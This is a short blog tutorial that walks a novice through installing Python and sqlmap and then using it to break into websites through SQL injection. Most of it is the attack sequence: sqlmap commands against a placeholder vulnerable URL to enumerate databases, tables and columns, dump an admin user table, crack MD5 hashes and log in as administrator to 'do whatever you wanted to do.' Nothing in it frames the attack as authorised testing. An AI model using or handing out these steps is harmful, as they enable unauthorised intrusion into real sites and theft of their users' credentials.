Today I will introduce you a very simple tool which will ease your SQL injection procedure. With the help of this tool even a noob can also hack a website.
About Sqlmap:
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
To use this you need to download and install python.
Installing and setting path for python:-
Step 1: Download python from www.python.org
(Download Python 2.7)
Step 2: Unzip that and install that in your computer.
Step 3: Go to control panel --> Go to System --> Click on Edit the system Environment variable.
Step 4: Then follow the steps given in the pic. Edit the environment variable as C:\python27;
Step 5: Click Ok and Restart your laptop.
Sqlmap:
Step 6: Download sqlmap from www.sqlmap.org.
Step 7: Unzip that and save that in your desired folder. (like I have saved that in C:)
Step 8: Open cmd by pressing windows + R. And then typing cmd and hit enter.
Step 9: Go to the folder where sqlmap is stored.
C:> cd sqlmap
Step 9: Run sqlmap and use it. Find a vulnerable url (how to find will discuss in other post, let here vulnerable url be www.vulnesite.php?id=23)
C:/sqlmap> python sqlmap.py -u www.vulnesite.php?id=23
Step 9: Then find the database of the website.
C:/sqlmap> python sqlmap.py -u "www.vulnesite.php?id=23" --dbs
Step 10: Then find the tables and then column. (Let database found be admin)
C:/sqlmap> python sqlmap.py -u "www.vulnesite.php?id=23" --tables -D admin
(tables found be admin)
C:/sqlmap> python sqlmap.py -u "www.vulnesite.php?id=23" --columns -D admin -T user
Step 11: Get all the data from the tables.
C:/sqlmap> python sqlmap.py -u "www.vulnesite.php?id=23" --dump -D admin -T user
Step 12: You get the username and password. Now you can find the admin login page and type the username and the password (if its in MD5 hash then you need to decode that from various website). Now login and do whatever you wanted to do.
Author:Unpredictable
For any query feel free to contact us @ prashantsavior@gmail.com and don't forget to like us on Facebook.
No comments:
Post a Comment